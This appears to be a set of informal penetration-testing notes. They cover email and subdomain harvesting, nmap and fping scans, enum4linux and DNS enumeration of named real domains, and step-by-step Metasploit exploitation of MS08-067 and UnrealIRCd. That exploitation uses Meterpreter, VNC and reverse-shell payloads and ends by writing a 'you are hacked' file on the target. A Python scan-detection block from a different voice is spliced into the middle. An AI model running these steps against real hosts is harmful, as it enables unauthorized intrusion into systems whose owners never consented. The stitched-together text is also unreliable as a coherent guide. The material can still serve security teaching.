theharvester – A tool for gathering e-mail accounts and subdomain names from public sources (e.g. nttdata.com)
Usage: theharvester options
-d: Domain to search or company name
-b: Data source (google,bing,bingapi,pgp,linkedin,google-profiles,people123,jigsaw,all)
-s: Start in result number X (default 0)
-v: Verify host name via dns resolution and search for virtual hosts
-f: Save the results into an HTML and XML file
-n: Perform a DNS reverse query on all ranges discovered
-c: Perform a DNS brute force for the domain name
-t: Perform a DNS TLD expansion discovery
-e: Use this DNS server
-l: Limit the number of results to work with (bing goes from 50 to 50 results, google 100 to 100, and pgp doesn't use this option)
-h: use SHODAN database to query discovered hosts
Examples: theharvester -d microsoft.com -l 500 -b google
theharvester -d microsoft.com -b pgp
theharvester -d microsoft -l 200 -b linkedin
1) Network scan
2) Port scan
3) Vulnerability scan
1) NETWORK SCAN:
i) AngryIP scanner
ii) Network scanning with nmap (built-in tool in Kali):
#nmap -sn 192.168.0.1-255
iii) fping:
#fping -g 192.168.0.1/24
#fping -C 1 192.168.0.1
iv) Netdiscover:
#netdiscover -r 192.168.0.1/24
2) PORT SCAN:
List of TCP communication flags:
1) SYN
2) ACK
3) RST
4) FIN
5) PSH
6) URG
1) Stealth scan (SYN scan):
#nmap -sS 192.168.0.112
#rdesktop 192.168.0.112
#nmap -sS eenadu.net
3) TCP connect scan:
#nmap -sT 192.168.0.112
Software version detection scan:
#nmap -sV 192.168.0.112
OS detection scan:
#nmap -O 192.168.0.112
FIN scan:
#nmap -sF 192.168.0.112
Xmas scan:
#nmap -sX 192.168.0.112
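As an added defender-side example (not part of these notes), the following Python picks the scan types listed above out of constructed firewall log lines: a source sending bare SYNs to many distinct ports (the first packet of -sS and -sT), the bare-FIN and FIN+PSH+URG combinations sent by -sF and -sX, plus the empty-flag null scan (nmap -sN) from the same family, which the notes do not list. The log format, field names, IP addresses and the port threshold are all assumptions.

```python
import re
from collections import defaultdict

# Constructed, simplified firewall log lines (assumption: key=value fields with a
# comma-separated FLAGS field; a real firewall export needs its own regex).
SAMPLE_LOG = """\
SRC=192.168.0.50 DST=192.168.0.112 PROTO=TCP SPT=40001 DPT=22 FLAGS=SYN
SRC=192.168.0.50 DST=192.168.0.112 PROTO=TCP SPT=40002 DPT=80 FLAGS=SYN
SRC=192.168.0.50 DST=192.168.0.112 PROTO=TCP SPT=40003 DPT=445 FLAGS=SYN
SRC=192.168.0.50 DST=192.168.0.112 PROTO=TCP SPT=40004 DPT=3389 FLAGS=SYN
SRC=192.168.0.77 DST=192.168.0.112 PROTO=TCP SPT=51000 DPT=445 FLAGS=FIN
SRC=192.168.0.77 DST=192.168.0.112 PROTO=TCP SPT=51001 DPT=445 FLAGS=FIN,PSH,URG
SRC=192.168.0.77 DST=192.168.0.112 PROTO=TCP SPT=51002 DPT=445 FLAGS=
SRC=192.168.0.20 DST=192.168.0.112 PROTO=TCP SPT=52000 DPT=80 FLAGS=SYN
SRC=192.168.0.20 DST=192.168.0.112 PROTO=TCP SPT=52000 DPT=80 FLAGS=ACK,PSH
"""

LINE_RE = re.compile(r"SRC=(\S+) .*?DPT=(\d+) .*?FLAGS=(\S*)")

# Flag combinations no normal TCP stack sends; each maps to the nmap scan that uses it.
ILLEGAL_COMBOS = {
    frozenset(): "null_scan",                       # nmap -sN
    frozenset({"FIN"}): "fin_scan",                 # nmap -sF
    frozenset({"FIN", "PSH", "URG"}): "xmas_scan",  # nmap -sX
}
SYN_PORT_THRESHOLD = 4  # distinct ports hit with a bare SYN before we call it -sS/-sT

def detect_scans(log_text):
    """Return {src_ip: sorted scan types} for sources whose traffic looks like a port scan."""
    syn_ports = defaultdict(set)   # src -> distinct destination ports probed with SYN only
    findings = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        src, dport, raw = m.groups()
        flags = frozenset(f for f in raw.split(",") if f)
        if flags in ILLEGAL_COMBOS:
            findings[src].add(ILLEGAL_COMBOS[flags])  # one packet is enough evidence
        elif flags == {"SYN"}:
            syn_ports[src].add(int(dport))            # a lone SYN is normal; count ports
    for src, ports in syn_ports.items():
        if len(ports) >= SYN_PORT_THRESHOLD:
            findings[src].add("syn_scan")
    return {src: sorted(kinds) for src, kinds in findings.items()}

if __name__ == "__main__":
    for src, kinds in detect_scans(SAMPLE_LOG).items():
        print(src, kinds)
```

The host 192.168.0.20 opens one ordinary connection and is not reported; the threshold is the knob to tune against your own baseline traffic.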
Enumeration:
#nmap -A 192.168.0.112
#enum4linux -U 192.168.0.151  // to get all users
#enum4linux -M 192.168.0.151  // to get the machine list
#enum4linux -S 192.168.0.151  // to get shared folder details
#enum4linux -P 192.168.0.151  // to get the password policy
DNS:
#dnsenum gmail.com
#dnsrecon -t srv
#dnsrecon -t srv -d nttdata.com
#fierce -dns icicibank.com
Metasploit framework:
1) msfconsole
2) msfvenom
msfconsole contains:
1) exploits
2) payloads
3) post
4) auxiliary
5) encoders
6) nops
msfvenom contains:
1) payloads
2) encoders
3) nops
Metasploit framework:
Steps to exploit Windows XP / Windows Server 2003 via the MS08-067 (ms08_067_netapi) vulnerability:
step 1: open msfconsole
step 2: show exploits
step 3: use
step 4: show options
step 5: set RHOST
Once the target host and port are configured, we need to get control with the help of a payload.
step 6: set payload
step 7: show options
step 8: set LHOST
step 9: set LPORT 1161 (any port number from 0-65535 can be used here except port 442)
step 10: show options
step 11: exploit
Steps to exploit Windows XP / Windows Server 2003 with the VNC inject payload:
step 1: open msfconsole
step 2: show exploits (the search option gives the exact exploit name directly: #search ms08_067_netapi)
step 3: use
step 4: show options
Once the target host and port are configured, we need to get control with the help of a payload.
step 5: set payload
step 6: show options
step 7: set RHOST
step 8: set LHOST
step 9: set LPORT 1161 (any port number from 0-65535 can be used here except port 442)
step 10: show options
step 11: exploit
Steps to exploit Windows XP / Server 2003 with the Meterpreter payload:
step 1: open msfconsole
step 2: show exploits (the search option gives the exact exploit name directly: #search ms08_067_netapi)
step 3: use
step 4: show payloads
Once the target host and port are configured, we need to get control with the help of a payload.
step 5: set payload
step 6: show options
step 7: set RHOST
step 8: set LHOST
step 9: set LPORT 1161 (any port number from 0-65535 can be used here except port 442)
step 10: show options
step 11: exploit
Metasploit commands:
Steps to exploit a Unix/Linux host through IRC port 6667 where the UnrealIRCd software is listening:
step 1: open msfconsole
step 2: show exploits (the search option gives the exact exploit name directly: #search unrealirc)
step 3: use
step 4: show options
step 5: set RHOST
step 6: show payloads
step 7: set payload cmd/unix/reverse
step 8: show options
step 9: set LHOST
step 10: set LPORT 1161
step 11: ls -l -a
# pwd
# echo "you are hacked...." > ravi.txt  (the txt file will be created)
# ls  (to confirm the file exists)
# cat ravi.txt  (to open the txt file)